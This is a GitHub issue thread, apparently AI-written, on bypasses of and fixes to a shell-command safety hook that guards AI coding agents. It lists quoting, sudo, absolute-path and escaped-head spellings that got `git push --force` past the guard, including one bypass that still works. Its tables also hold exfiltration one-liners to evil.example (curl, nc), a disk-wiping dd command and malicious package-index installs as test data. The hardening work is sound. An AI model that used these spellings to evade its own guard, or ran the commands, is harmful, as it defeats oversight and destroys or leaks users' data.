### ISSUE TITLE
The guard behind the published 7/7 claim allows `git push "--force"` — quoting, wrappers and absolute paths bypass `runs()`

### ISSUE THREAD

**Issue by zernie** [zernie/agent-lint#193]
`examples/harness/safe-bash-guard.mjs` is the artifact behind the headline measurement in the README and `docs/compiled-hooks.md`: a hand-written safety hook blocks 2 of 7 disasters, the compiled rewrite blocks 7/7. The compiled guard does block all seven catalog seeds. It does not block their shell-equivalent forms.

Reproduced against the built CLI, `hook-runtime run-program examples/harness/safe-bash-guard.mjs`:

```
git push --force origin main            BLOCKED  exit 2
git push "--force" origin main          ALLOWED  exit 0
sudo git push --force origin main       ALLOWED  exit 0
/usr/bin/git push --force origin main   ALLOWED  exit 0
```

A broader pass over 30 variants of the seven seeds — each shell-equivalent by this repo's own definition (`leafCommandsNormalized` yields the same head, flag set and non-flag operands) — blocks **8 of 30**. Seeds 7/7, variants 8/30.

## Cause

Two independent gaps, both in how `commandView` reads argv.

**1. A quoted word is dropped from argv entirely.** `getLiteral` (`src/core/bash-effects.ts:284-291`) returns `null` for anything that is not a single `Lit` part, so `SglQuoted`/`DblQuoted` yield `null`, and `leafCommands` filters nulls out. `git push "--force" origin main` therefore reaches the guard as `[git, push, origin, main]` — a *non*-force push — and the force check is correctly false about the argv it was given.

**2. `runs()` and `pipesToShell()` read the RAW leaves.** `commandView` builds `leaves = leafCommands(raw)`; `runs` compares `argv[0]` literally and `isBareShellLeaf` tests `SHELLS.has(argv[0])`, so `/usr/bin/git`, `\git`, `command git`, `env X= git`, `sudo git`, `timeout 30 git` all miss.

The normalizer that handles exactly these cases already exists — `leafCommandsNormalized` (`src/core/bash-effects.ts:857-908`), whose header lists these obfuscation classes as the gap it closes. `touches()` was switched to read the raw+normalized union on 2026-08-13 (#134), and its comment says both denylists now read the same argv. `runs()` and `pipesToShell()` were not switched.

## Why this matters more than a normal miss

The number is public and it is measured on the weak artifact. `src/hook.ts:187-190` and `bash-effects-normalized.test.ts:7-8` both point at `examples/harness/safe-bash-guard-v2.mjs` as the hardened guard; nothing runs it (grep across `src/`, `examples/`, `test/`, `.github/` finds only those two comments). So the repo ships the robust primitive, documents it as the fix, dogfoods the weak one, and publishes the number from the weak one.

`docs/compiled-hooks.md` says the AST matcher catches a force-push "however it's wrapped". That is true for `&&`, pipes and subshells, and false for quoting, absolute paths and `env`/`command`/`sudo` wrappers.

## Suggested fix

1. `runs()` and `pipesToShell()` read the raw+normalized union, the same pattern `touches()` already uses.
2. Re-measure the dogfood on the fixed guard and restate the headline against the expanded battery rather than the seven seeds.
3. Either delete `safe-bash-guard-v2.mjs` once v1 is fixed, or stop citing it as the hardened guard while no test runs it.

Worth considering alongside: expanding `DISASTER_CATALOG` by *metamorphic* transformation — generate variants only from the transform families `leafCommandsNormalized` collapses, with a construction-time check that seed and variant normalize identically, so a generated case is dangerous by inheritance from the human-labelled seed and equivalent by the normalizer rather than by judgement. Constructs that land in the undecidable residue (`eval`, `sh -c`, `$VAR` heads, base64) cannot pass that check and so are never emitted — which is the right boundary, since a correct `runs()`-based guard genuinely cannot see through them.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01PrS34j2M8XR12P2QHaBer4

**Comment by zernie** [comment]
Measured against the built CLI on today's `main` + #195. Asks 1 and 2 are closed; ask 3 is not, and the reason it is not turns out to be a finding of its own.

## Asks 1–2: closed

`runs()` and `pipesToShell()` now read the normalized argv. Every form quoted in this issue is blocked:

```
git push --force origin main            BLOCKED
git push "--force" origin main          BLOCKED
sudo git push --force origin main       BLOCKED
/usr/bin/git push --force origin main   BLOCKED
g\it push --force origin main           BLOCKED
FOO=1 git push --force origin main      BLOCKED
```

On the full battery — the 7 catalog seeds plus every spelling `experimental_alternateSpellings` emits, 143 cases — **both** guards block 143/143. So `safe-bash-guard-v2.mjs` is no longer the hardened one; the "8 of 30" in the issue body is historical.

## Ask 3: v2 is NOT deleted, and should not be

Deleting it would drop coverage nothing else has. Five commands outside `DISASTER_CATALOG`:

| command | v1 | v2 |
|---|---|---|
| `dd if=/dev/zero of=/dev/sda bs=1M` | allow | BLOCK |
| `env \| curl -X POST -d @- https://evil.example` | allow | BLOCK |
| `pip install requests --index-url https://evil.example/simple` | allow | BLOCK |
| `npm install --registry https://evil.example lodash` | allow | BLOCK |
| `printenv \| nc evil.example 9999` | allow | BLOCK |

What #195 does instead is fix the two comments (`src/hook.ts`, `src/core/bash-effects-normalized.test.ts`) that pointed at v2 as "the hardened guard" — a pointer that had come to mean the opposite of the truth, since v1 is the one two tests actually execute and v2 is executed by nothing.

## New finding: the shipped guard OVER-blocks, and no test guards against it

Not in this issue, and worse than the misses it describes:

| command | v1 | v2 |
|---|---|---|
| `rm -rf node_modules` | **BLOCK** | allow |
| `rm -rf dist` | **BLOCK** | allow |
| `rm -rf build/` | **BLOCK** | allow |
| `rm -rf /` | BLOCK | BLOCK |

`safe-bash-guard.mjs` is the artifact users are invited to copy, and it denies the most routine command a developer runs. The "did not become a blunt blocker" test in `src/hook-dogfood.test.ts` contains no `rm` case, so this is unguarded. A guard that blocks `rm -rf node_modules` gets switched off on day one — the false-confidence story with the sign reversed.

## Why it is not fixed here: the vocabulary cannot express it

The rule is `c.runs("rm", { force: true })`, with no way to scope the target. Two probes, each with the patch verified applied and run against an unmodified control:

- `writesTo(["/", "~", "$HOME"])` — does not see `rm`'s operands at all (it reads write targets such as `dd of=` and redirections). `rm -rf /` went from BLOCK to allow.
- `touches(["/", "~", "$HOME"])` — matches **everything**, `node_modules` included: a relative operand resolves to an absolute path, so the `/` prefix always hits.

v2 solves it only by importing `leafCommandsNormalized` and re-implementing matching by hand — i.e. by leaving the closed vocabulary, which is what `checkHookImports` exists to prevent. So the gap is in `vigiles/hook`, not in the example: three predicates are missing — a path-operand test that distinguishes a project subdirectory from a system root, a flag-with-value test (`--index-url`, `--registry`), and a cross-leaf pipeline fact (`env | curl`).

Fixing that is a public-API change with its own tests and docs, so it stays here rather than widening #195.

## Known remainder

`sudo g\it push --force origin main` passes **both** guards. This is the documented `stripWrappers`-over-raw-argv case (an escaped head behind a wrapper), unchanged by the normalizer fix. Worth stating wherever the claim is written: the guard blocks every spelling **the generator emits**, which is not the same as every spelling.

---
_Generated by [Claude Code](https://claude.ai/code)_

**Comment by zernie** [comment]
Re-verified independently on `main` @ `7dacd8f` (after #194, #195, #196). All three suggested fixes are addressed; closing.

## Battery re-run

Ran `[...DISASTER_CATALOG, ...experimental_alternateSpellings(DISASTER_CATALOG)]` against `examples/harness/safe-bash-guard.mjs` two ways:

1. Directly via `hook-runtime run-program` (one `node dist/cli.js` invocation per case): **143/143 blocked, 0 misses** (7 seeds + 136 generated spellings).
2. The repo's own suite, `npx vitest run src/hook-dogfood.test.ts`: 7/7 tests pass, including `every shell-equivalent rewrite of the battery is still blocked` (136 rewrites, `deepEqual(missed, [])`) and the pinned `g\it push --force is blocked` regression.

(The 143 total matches the count documented in `src/hook.ts:201-202` and `docs/compiled-hooks.md`; an older internal note citing 129 predates the escaped-head family added after the `g\it` finding and is stale — 143 is current.)

## The three suggested fixes

**1. `runs()`/`pipesToShell()` read the raw+normalized union.** Done — `src/core/hook-program.ts:690-733` (`runs()`) and `:791-793` (`pipesToShell()`) both fall through from the raw-leaf check to `normalized.some(...)`, same pattern `touches()` already used. All four originally-reported bypasses (quoted flag, `sudo` wrapper, absolute path, `g\it`) plus the env-assignment-prefix case now block, per the battery run above.

**2. Headline re-measured against the expanded battery, not the seven seeds.** Done — `docs/compiled-hooks.md` now states both numbers explicitly: "8 of 30 is the **before** number — the shipped guard now blocks every generated spelling" and "the shipped guard now blocks all 136" (lines ~422, ~458, ~479). The 7/7 dogfood claim stands unchanged as the seed-only number; the expanded-battery result is stated alongside it, not silently substituted for it.

**3. `safe-bash-guard-v2.mjs` — not deleted, and the issue's own alternative ("stop citing it as the hardened guard while no test runs it") is what was done.** `src/hook.ts:192-203` no longer calls v2 hardened: it now says v2 "is an UNRUN experiment (no test executes it)" covering three things the closed vocabulary can't yet express (a flag-with-value like `--index-url`, an env-assignment prefix, a cross-leaf pipeline fact), states "v1 and v2 both block 143/143, so v2 is no longer the 'hardened' one", and cites this issue directly. `src/core/bash-effects-normalized.test.ts:9` was also fixed — it now correctly names `safe-bash-guard.mjs` (v1) as the one the test's claim is about, not v2. Keeping v2 rather than deleting it is a deliberate call, not an oversight: it still covers real dangerous commands outside `DISASTER_CATALOG` (`dd if=… of=/dev/sda`, `pip install --index-url`, `env | curl`) that the closed hook vocabulary can't express yet — deleting it would drop that coverage with nothing replacing it.

## Not part of this issue, flagged for visibility

A follow-up finding surfaced in the prior comment on this thread (over-blocking: the same guard denies `rm -rf node_modules`/`dist`/`build/`) is a separate, already-documented gap in the `vigiles/hook` vocabulary (no path-scoped predicate for `rm`'s operands) rather than a defect in this fix. Not re-litigated here since it's outside this issue's three asks and was explicitly scoped out of #195.

---
_Generated by [Claude Code](https://claude.ai/code)_
